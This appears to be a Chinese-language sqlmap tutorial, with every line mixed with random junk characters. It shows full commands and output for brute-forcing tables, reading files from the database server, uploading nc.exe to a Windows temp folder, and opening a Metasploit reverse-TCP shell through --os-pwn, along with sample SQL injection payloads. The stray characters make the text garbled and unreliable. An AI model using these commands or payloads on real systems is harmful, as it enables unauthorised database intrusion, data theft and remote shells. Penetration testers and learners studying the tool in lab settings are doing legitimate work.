2 d8 B: j! V2 g' q8 F4 N3 S$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner / ?% Q$ X4 s! y8 `8 @$ j/ o1 ^. Q" V, J7 Y
[...], e& X. ?( |8 r q, x5 m a; `
[hh:mm:39] [INFO] testing MySQL( P1 K( m( `7 ?* t+ D+ f u$ y
[hh:mm:39] [INFO] confirming MySQL 7 r) s* y; q( d5 z& X8 V: w1 ][hh:mm:40] [INFO] the back-end DBMS is MySQL ) d% E7 p) T3 a: R! Y4 p9 ?0 [[hh:mm:40] [INFO] fetching banner( u* i% T+ q" V' i4 C) C
web server operating system: Windows 6 x ^9 [4 f9 Wweb application technology: PHP 5.3.1, Apache 2.2.14 + A7 F. g% Y3 }3 B0 G- [back-end DBMS operating system: Windows : g2 r. y3 s1 |, k6 u3 ?' x8 tback-end DBMS: MySQL < 5.0.0) j2 M1 j2 T; B7 y/ {6 d9 }
banner: '4.1.21-community-nt' " ]: D0 ]1 _% k' i5 W 3 ~* Q7 A; b' C[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt' / b5 o7 B- m u+ G0 O[hh:mm:40] [INFO] adding words used on web page to the check list- Z# V4 b. ^, S0 ]3 l" o0 X
please enter number of threads? [Enter for 1 (current)] 88 W y/ N: a7 s& G6 }
[hh:mm:43] [INFO] retrieved: users- q0 N/ Y5 h, T0 o6 `! n1 t* E
) R9 j4 c# C0 L! K; l
Database: testdb ! Z+ E4 F3 D4 Y+ m" d2 t8 \# y[1 table]! c# R. H5 v" Z
+-------+- S8 G- n1 m" l1 u
| users |) I% ?: ~1 Q& r
+-------+ * Z( `6 g% o# x& R9 J- p$ B6 H) j" P( J3 h$ s! W2 V) `; b7 M
暴力破解列名 - @! F! d4 b. A! l* H- C9 z 1 I }0 N5 f' u E3 M. j' N c参数:--common-columns 6 s; d. g& I q! y ; |9 a6 C& `- I2 P1 P, j与暴力破解表名一样,暴力跑的列名在txt/common-columns.txt中。 & O! i0 e) @. R& }6 x) |; P用户自定义函数注入 . c: G+ Z, M4 m! |) t' v - v, }9 z7 c. f% V# }% W; J" t参数:--udf-inject,--shared-lib 9 q" T. r8 P3 S, P$ s6 f; E- _( }8 q5 `
你可以通过编译MySQL注入你自定义的函数(UDFs)或PostgreSQL在windows中共享库,DLL,或者Linux/Unix中共享对象,sqlmap将会问你一些问题,上传到服务器数据库自定义函数,然后根据你的选择执行他们,当你注入完成后,sqlmap将会移除它们。9 n9 |! X5 i% R! }+ B7 l
系统文件操作 z3 p1 Z a7 J7 M8 C: b7 @5 g
从数据库服务器中读取文件 # o J/ {$ S; |9 P$ h: H* G. F U8 b1 h1 \- c$ k$ V3 L
参数:--file-read' K2 B! O7 f" h$ Q+ {4 i* V/ a$ w
% o$ ?+ p% d g- D' Q% V8 G# T+ T
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。 ' p9 E4 \8 N8 V" g' A 9 V. F2 z' E+ T7 Y# p7 {列举一个Microsoft SQL Server 2005的例子:+ R2 z" x J. C! P
/ r. M4 r# w9 \$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \7 l9 {9 T* v. z7 R
--file-read "C:/example.exe" -v 16 @$ O- Q, o( G( i3 C" I
8 O9 I/ p" v J0 N: J# t- u" u: |
[...]' a% E$ c7 A) e
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server & s6 x8 Q7 }9 h3 \4 Rweb server operating system: Windows 20008 l# }4 @+ r0 W8 d0 G% P+ E
web application technology: ASP.NET, Microsoft IIS 6.0, ASP 7 b5 K# N8 _6 X8 G( U( Pback-end DBMS: Microsoft SQL Server 2005 ( @4 T2 }% Z+ |/ S0 H+ e9 b % n7 ]- d j8 c: ]) u% ^* G0 h[hh:mm:50] [INFO] fetching file: 'C:/example.exe'9 ?8 V5 V: j# Z# U- Z0 @
[hh:mm:50] [INFO] the SQL query provided returns 3 entries" V8 d3 P0 k7 s8 _( m
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe' G+ m; K2 s; s" ^% f2 B
[...]! W& F( ?/ X3 e0 Z& q
3 X, X! u1 G4 |/ l
$ ls -l output/192.168.136.129/files/C__example.exe : H# B( U8 H o/ @9 w
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe 5 h* d, V) d1 m ?0 D5 p 1 K* S& U( s4 Y8 w4 M$ file output/192.168.136.129/files/C__example.exe 0 N$ r: U! F" A
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel l; W9 o6 p' ^2 o( O7 b80386 32-bit 7 K2 L8 [6 |+ }4 L! H& X; \. w2 J- o9 ?2 X
把文件上传到数据库服务器中 0 w' I9 Y2 h( [6 T/ m& S! j $ {) q1 k) d" Q参数:--file-write,--file-dest ' C, A. {5 b# ]+ j, c/ a( N 9 m7 ?; p: @9 s8 g/ y& [当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。$ `8 a) M- S7 H2 K6 w2 l& m7 k4 l4 R
. Q+ M- ^1 X8 p( v0 G' @8 a列举一个MySQL的例子:% F G- Y) {3 i4 r9 u* o7 x
% x+ j( }. ^9 F' W, L$ file /software/nc.exe.packed % h+ \) h/ \) A' x
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit- ~9 j `2 E. Z9 i! w4 Z6 }. K, ]
- `) O6 x# F# z6 U( C4 s6 R6 @
$ ls -l /software/nc.exe.packed- u8 S7 }" o" I
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed6 L5 F, j( l% r4 U8 W
, K3 V {& W, F2 t! m
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \ 6 \( s2 K8 @- c! a/ l"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 18 C9 o+ Q) m D" A9 j) ~7 h. U
0 l* ]2 ~: t& |+ j" g[...] . h- g ~ ]3 t( H& C; H$ J[hh:mm:29] [INFO] the back-end DBMS is MySQL ) J# h; \3 z* y5 Sweb server operating system: Windows 2003 or 2008 & t2 W1 p/ Y; [web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727: G# ], E4 x8 H8 P7 S/ g1 ~& D
back-end DBMS: MySQL >= 5.0.0 . J9 n8 d- Z* o* [8 t+ g( j4 s" ~% {+ L( ~; U8 P, q) q5 L2 |
[...]( L0 D9 t$ [; ~& E6 @/ s9 h+ {
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully . [' ^* p! K# H2 t; y3 nwritten on the back-end DBMS file system? [Y/n] y W$ U! ^5 P, g0 P
[hh:mm:52] [INFO] retrieved: 31744 $ I0 F, ~% p" H[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, ( p& y4 }: y0 V
same size as the local file '/software/nc.exe.packed'7 r/ n _, f. u. R3 E; M
; H6 F j. }0 u9 M! E当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数,可以在数据库与攻击者直接建立TCP连接,这个连接可以是一个交互式命令行的Meterpreter会话,sqlmap根据Metasploit生成shellcode,并有四种方式执行它:8 o! ?; W, ]9 P9 L6 f: p K
' Y4 ~" g8 J' T$ b+ J1 m {; Q1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode,支持MySQL和PostgreSQL数据库,参数:--os-pwn。 , y- N7 Z8 U9 O2、通过用户自定义的函数上传一个独立的payload执行,MySQL和PostgreSQL的sys_exec()函数,Microsoft SQL Server的xp_cmdshell()函数,参数:--os-pwn。! y; ~2 x8 P0 K' j2 k
3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode,当sqlmap获取到的权限足够高的时候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。 & G2 X* d6 T) `* a: x$ B' [: S, B4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004),在内存中执行Metasploit的payload,参数:--os-bof/ N: l0 g: ^6 Z1 H
& J& o, V7 R8 |5 D4 a8 g+ I
列举一个MySQL例子:. K( H& H d% @" f) z6 k5 i! D! J
7 Z& G7 z& Y3 W+ B9 W7 l0 @
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit+ p& x. g7 X7 C1 V6 L- ?* p
Q7 G; u2 O! r1 |- V" O: k0 E
[...]2 X- E8 k. @( `
[hh:mm:31] [INFO] the back-end DBMS is MySQL3 k0 z" B' [# Q& Y% h @
web server operating system: Windows 2003 " A; @1 F2 v$ R% \* Mweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 . D3 ? n" I9 tback-end DBMS: MySQL 5.0( b* `9 K0 v/ N1 |# d
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system ' L- F( B/ o0 s k2 @[hh:mm:31] [INFO] the back-end DBMS operating system is Windows! S' B" ~; f3 j, {' |0 M* n4 W1 L
how do you want to establish the tunnel?$ Y0 ~. E6 t" @- Y
[1] TCP: Metasploit Framework (default) # {; h4 n1 e2 @1 x' u% i[2] ICMP: icmpsh - ICMP tunneling4 i) P8 L5 V9 h
> E1 h0 K2 O+ N: K: S[hh:mm:32] [INFO] testing if current user is DBA7 T5 Q. M* z+ m3 s
[hh:mm:32] [INFO] fetching current user 3 Q9 w2 b+ S! G& U9 Cwhat is the back-end database management system architecture? ( c- _0 |: i/ C% q0 \[1] 32-bit (default)! O, C* S" y! c. k9 v& {* q1 }( J
[2] 64-bit + D1 D' z. |" [( q& N( t- t/ N9 F> 1 B6 L( m/ X, r% q9 f
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist ) L' I9 w* {) X7 [: x( n. s[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist: U- @) |# R- g
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner1 H" }* S7 ]; G: a/ s) U% W
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path 9 k9 i' m. n! ^: g; K& t[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file- v( L0 g4 i6 ^' B/ B2 h
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file& x6 p! {9 E3 N5 U
how do you want to execute the Metasploit shellcode on the back-end database underlying " h& `& z+ q2 C$ d( _operating system? : k4 Y, z: V9 K! t0 s[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) " H/ j' ~( O9 Z- f& N[2] Stand-alone payload stager (file system way)5 w: e1 @0 ]$ g( ~
> . W# a6 i% X' A" J
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode ; E. A" ?1 C4 @which connection type do you want to use?* C5 Y8 i6 F" Q) f; J4 a
[1] Reverse TCP: Connect back from the database host to this machine (default) 9 s- ~' G$ o3 a[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 7 G* b2 m! C# u; j# Nbetween the specified and 65535# v9 `* L5 Z1 p% {- W- O& V9 @% _' s
[3] Bind TCP: Listen on the database host for a connection' N6 d6 ]! C; r: x
> 1 ^2 b, X" l2 L5 S
which is the local address? [192.168.136.1] ; O p# t3 x! T3 C; g3 ~# y6 J! [' g! _which local port number do you want to use? [60641] : B+ G6 Y6 [4 [
which payload do you want to use? $ x6 s, q( i! h' W, n+ P[1] Meterpreter (default). M$ b! \- I2 k/ a1 X
[2] Shell' h$ k/ P; k7 k! |- q2 g
[3] VNC F+ B1 r+ S/ T( v
> 2 \2 U. P+ a1 g
[hh:mm:40] [INFO] creation in progress ... done) J2 x3 R3 o: ^' C( N, E g, [: R/ Z
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait.. 9 @9 g( Z, u" ]8 q ]" B) ]0 Q& S7 q+ G$ I: A
_ & M, o, T8 C+ J% | | | o5 d$ l2 _ z) Q' z9 A* j
_ _ _ _ _|_ __, , _ | | __ _|_ + l" E( z$ D% W6 r/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| | u; _- A4 P% I# {' e. e| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/- M2 }5 @6 j8 {4 E6 ~0 a
/| ) f' @" Y) X/ S) K* W% O/ F8 ` \|% @9 ~. V3 C3 U' {: O2 W" ^8 ~% f3 c
8 d# ^5 N' w4 \% z2 E/ f # T, c( i" _: @: ?2 A5 L =[ metasploit v3.7.0-dev [core:3.7 api:1.0] 7 ]+ x+ l4 z7 o+ -- --=[ 674 exploits - 351 auxiliary . j. W, j1 `5 \$ n+ -- --=[ 217 payloads - 27 encoders - 8 nops3 r- m0 I$ g ?; N7 `0 F$ Z
=[ svn r12272 updated 4 days ago (2011.04.07)* c& O _" r& k
4 I0 ]9 i; a/ x" u忽略session文件保存的查询,重新查询。 . J3 x" l6 N' r7 Y使用DBMS的hex函数 ' S* g! y, v. p, _7 v 8 X3 Q" f! y4 ?6 _参数:--hex 3 x k$ a. b1 F% J: B1 Y) R 6 d; v/ U8 b. p- N2 b有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免: 2 P" E: a3 W7 a6 n) m$ U- Y8 ^1 W+ _; X8 d" j7 p
针对PostgreSQL例子:, e4 f3 u8 i! b# ~. W
! S9 z2 R8 y7 r* P, E2 c& C
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors 4 ?! S8 q# C7 f. p/ t+ y & W6 h) M, \' i. ^[...]5 G3 [ A7 z- X4 V; S3 {
[xx:xx:14] [INFO] fetching banner4 B7 } |8 G+ \. F& |2 {
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC) q' J+ [9 i ]4 F+ [$ O" w. k* I! q* Q[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'% U" a8 W j' C; z, ]
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by6 t1 v9 [/ ?" O* G
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2! i" O6 `6 o) ?8 d9 _
[...]' o0 c$ i: x( j9 q' y1 a
6 a& ^" F3 L& Q8 [
自定义输出的路径: V( i; k2 u' R8 X
% g8 `+ {* [' X4 e( M
参数:--output-dir $ N+ p+ S5 @" b, x# M& V" Y0 s) `. V+ a
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:--output-dir=/tmp ^8 Z8 m! [) _$ [, S3 F从响应中获取DBMS的错误信息 ) R; W U2 w; J$ Q7 y% h! N( }3 ?% r" n% H
参数:--parse-errors( @; r) Q8 K }; f( o
L5 Z4 r) _5 e" E# z- f, Z
有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。 , O/ x( R( T* p # K' o" ^+ A* l6 d' w$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors: m7 N' E9 g6 [- A3 \/ u g( C
[...], n1 t: P T: z7 f, Z; q1 K+ |
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test + [/ w: g3 }! A! P8 q[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) # ^8 f6 ~7 e/ B& }4 V- K0 _1 Z[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.. R$ m, S* C* V- Z
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'& y. ?; d [' S/ |* D
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) 5 V- H. l8 X4 w6 H: A[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list. 7 g5 T H. V0 G9 V2 O; _2 q8 v<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' 0 n7 r' y' Z7 J[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)' S3 W }+ s) {! J) q
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list. ; v$ v" S# R. {/ U6 l0 v- |<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'' H5 j7 n; ?' m9 Q
[11:12:17] [INFO] target URL appears to have 3 columns in query ) `0 C8 X/ U: a8 y2 p$ R% X0 w[...]8 r2 x6 V. |& [7 e, k7 t( F2 N6 c8 Q) ~
5 E8 g) i" m N' {# u& ?& \python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1" & [2 R0 a' x+ }3 @8 R( w: ?0 _+ f( p7 c4 B5 ^: `
可以写成:* I7 e; w T* h+ o9 r: M* i1 O
( K3 f) P, x2 ^5 Tpython sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"+ d8 ?& S% P& ]
* T# C9 \0 d. Y7 _0 P$ P# v
成功SQL注入时警告 / f( r9 T, j. \# Y4 t
$ i4 j- G7 e, w# k# H; B! A
参数:--alert5 b5 x$ ?: M% ?+ U
设定会发的答案 ) C" U0 [4 B* t, D" \& \! t: T1 o1 \; j! I2 S
参数:--answers 7 z: ^1 L" u, L( A' j$ Q& f; Y4 n( c
当希望sqlmap提出输入时,自动输入自己想要的答案可以使用此参数: 例子:$ ]# C* O# A0 [2 o
; \# K$ a( D3 H$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch 3 m2 y, r5 `; u: r[...] J7 A1 V, H; S3 f) D! I/ u
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' / m' _+ b; q0 P. dheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y: n c5 u# |: @3 m2 h
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N' w( v8 y- ~; ?
[...]# Q2 M' }4 k9 ` z8 z" \
8 e' [3 x2 J0 R) K有时服务端只接收移动端的访问,此时可以设定一个手机的User-Agent来模仿手机登陆。1 U" s. }/ x' a; W$ A
' L4 v8 b/ a; {0 c例如:$ R, g! b9 Y, z) F
+ E. w3 T% U% {& ]7 D$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile+ c: O/ d" \: a: K' U, l
[...] d# {3 _+ q& H/ ]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header? ) I1 M" ]; v* T/ t[1] Apple iPhone 4s (default)6 j. v" r7 j; F2 m( J
[2] BlackBerry 9900+ y( F% }' u, I( v) m
[3] Google Nexus 7 2 b+ [$ A4 v+ z" D3 T# }[4] HP iPAQ 63655 v6 V- a: }1 s h- v. F
[5] HTC Sensation . Q# E% |* G, M. K5 S2 S[6] Nokia N97. }' x+ V6 h6 o; J
[7] Samsung Galaxy S 6 Z' H0 {) Z+ F> 1 ) ]2 }) Z8 f$ x& T$ |[...] / _1 L1 d- k$ K7 h* A9 m8 K$ z% R5 R6 a( e
安全的删除output目录的文件 3 T( }8 J- c9 W; ?3 @% g8 F* R* @5 I k4 M: O) y q
参数:--purge-output 6 g9 y7 H R* ?# i, K3 ^! f/ ]/ w
有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。& h9 G2 ~: H( y
7 q/ `$ j! ^ m# e: z8 k1 R
例如:, ]) ?- U2 W3 {! \' p
R* z+ ?, V1 k6 p$ python sqlmap.py --purge-output -v 3% n( ?, v `6 _, x
[...] / W: U+ x: y; E; N+ t& S[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...9 F& u/ X" F% o* ~& p
[xx:xx:55] [DEBUG] changing file attributes 8 W, O' J: p/ D4 o$ z1 s[xx:xx:55] [DEBUG] writing random data to files : ?3 S6 }9 ^9 M; E* K[xx:xx:55] [DEBUG] truncating files! Y/ j5 Y% ~7 h4 D
[xx:xx:55] [DEBUG] renaming filenames to random values & B8 {$ m0 Z; H! U/ R% r' h9 Y[xx:xx:55] [DEBUG] renaming directory names to random values + s- H* z, m8 d3 ]1 |6 d& Q4 g( A6 ][xx:xx:55] [DEBUG] deleting the whole directory tree" \0 `1 g4 `1 z3 H5 L; {: `
[...] $ H6 x9 C9 k% {7 t Z4 v# V2 H6 l" M8 q启发式判断注入 , b" q3 a" J( D6 F9 k1 Q9 \4 c* m) V3 A) [7 N( E e5 @
参数:--smart / C8 A3 m ~9 W/ @4 w: T. W 8 D- V4 d" _( m- Y# B Q& j有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。8 x; @% x; d, T% P+ w, w: Y2 |
4 E8 g9 Y1 ?' k4 M* {; n, u Z
例子: 3 X0 @* ?4 O0 q: H0 I. Z/ f 1 w/ I* a/ r% q) p$ k$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart " h' h0 F! Y6 K4 N0 ^+ @+ i[...]3 V/ w* e& v! T: _
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic' I9 o% ]: O8 o6 T1 r
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic ! B* i6 n3 e6 }% d# }[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable7 y3 W0 j' U: F0 _
[xx:xx:14] [INFO] skipping GET parameter 'ca'. ^& _/ ?; ]3 X& y- j6 @
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic + t8 q; t' V5 ^[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic 5 m, d4 P) S/ p5 T( S0 s; `8 `: d[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable6 i0 c3 Y) J- {3 C
[xx:xx:14] [INFO] skipping GET parameter 'user'7 n( N0 ^( F2 c# u0 ]6 i
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic, q8 B8 i! e$ H, c2 N; D Z
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic 0 u8 Y- g6 b' }0 Y, ][xx:xx:14] [INFO] GET parameter 'id' is dynamic e& y" f: ~: F) Y5 I7 \
[xx:xx:14] [WARNING] reflective value(s) found and filtering out- ?/ w0 r: D: ~- z% Z. k# \+ E
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL'); y: R4 x% v' Z- I' S" K" r% a
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' z' \2 T! z6 t% t8 x7 {4 u
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y $ Y( v# B# Q. i( m0 ]' b# a Kdo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y ; Z, F4 o8 ?% V9 i[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' 1 z5 ~: K- K& U, d) s[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 8 ~. W4 l: F. s$ e; P9 T6 l[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' % [; }# z" b& L; a% J5 S[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 7 `0 A0 ]: k" \! _1 h6 l) l[xx:xx:14] [INFO] testing 'MySQL inline queries' " T! l o' j) s& j. r U[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries' ~5 f Y& { z+ M w) u
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' - m! K, z9 Y/ e1 O8 `[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' # O, [' f: A# i6 S7 W. ?2 u1 z# G[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable . x* i( u" G( I3 @) F3 g
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' l( F( I" o8 `
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found* J. ~8 r" F$ U
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 2 d4 I) S" {& g5 Q[xx:xx:24] [INFO] target URL appears to have 3 columns in query g* d) d6 {0 T4 r. l0 c% t8 |[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable & b, K* y8 u) ?& s[...] ( X2 ~/ T. d3 M5 M3 m5 L7 K0 T: u. N
初级用户向导参数4 @9 t- J0 ?: t% f3 ^( o9 q& _
" ]2 C# G I! v5 J9 J. p% ?% K参数:--wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。 : z5 O" C1 V2 R, s- f+ i I t6 o. b; r! X
$ python sqlmap.py --wizard6 O7 A) F+ }; w' R
! S% F1 ~* K; R% B9 `' X1 U[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + h" f# y8 V- O$ p0 {8 U
starting at 11:25:264 t- u* w. e9 e5 J! w$ g
( f# C* R6 r; g4 z9 V3 ^Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" |0 T/ m* c: I5 q, P+ `/ ^; ^* h; v
POST data (--data) [Enter for None]: 1 a% _2 G8 i* \Injection difficulty (--level/--risk). Please choose:6 F" c0 K7 H+ l: h) q; u
[1] Normal (default)$ Y4 ^' z9 S3 ^; q/ I
[2] Medium . ^* ^1 S& P- S' ?/ |. Q/ ~[3] Hard " l/ K' s5 x4 _4 |$ c! G# h> 10 U& ]( a. O& e) j. R5 t
Enumeration (--banner/--current-user/etc). Please choose: + x6 E: \6 h$ _, _[1] Basic (default) 7 @( c' @# i5 c9 r; i[2] Smart$ [, C6 ?/ \; p) N
[3] All 3 q2 h6 R) G5 |8 _3 U2 v* h, ~0 W" K> 1 4 e# P- G6 l: `& U$ Q/ V" e3 U+ @ : s$ J) \' i$ Nsqlmap is running, please wait..$ n8 v0 t/ B$ C- K' e/ O& `9 z# G
2 `. L$ o" j: v1 M' A
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y ( Z) g6 s- u" |/ m4 R6 t6 P- ddo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y 4 A# ?/ a* |* i) m1 w% vGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N + ~- A# u4 o% p' F8 {4 Osqlmap identified the following injection points with a total of 25 HTTP(s) requests:$ j% X3 f: l, S* _# g
--- . a4 x$ l) j8 y" K7 |8 g/ KPlace: GET + Y* Y$ E3 ^2 y+ h7 e0 j6 l& _9 ]Parameter: id % c0 M/ U; Q9 `( C Type: boolean-based blind4 ~9 J. D4 }" x$ I* y( I& U2 Q$ [
Title: AND boolean-based blind - WHERE or HAVING clause: j! A r* \+ z
Payload: id=1 AND 2986=2986 9 [$ P8 S0 ?& T: \. y' q % ?6 K0 e/ Y7 o( O3 s. B6 E& U Type: error-based' y; `6 T* O6 x+ Y" F) w( x. o
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause + {5 l5 I# j* P) R6 s: q Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))), A$ o! N4 [7 H9 W# n/ j
# v4 f* S. @* \8 u Type: UNION query7 b+ L0 P. X' S
Title: Generic UNION query (NULL) - 3 columns" C! E9 ]" Y; b: ^' Q; f7 v
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- 8 w2 m# |7 D6 c
% m6 I; S( b* T- I1 C! q, p
Type: stacked queries& n* T; n, Y0 v: |
Title: Microsoft SQL Server/Sybase stacked queries ) [ b Z5 w6 |% g; X Payload: id=1; WAITFOR DELAY '0:0:5'-- 4 {+ W' y5 {3 y& _% o. W# c" v! D/ ]; F" b7 L& Z' @# l' z
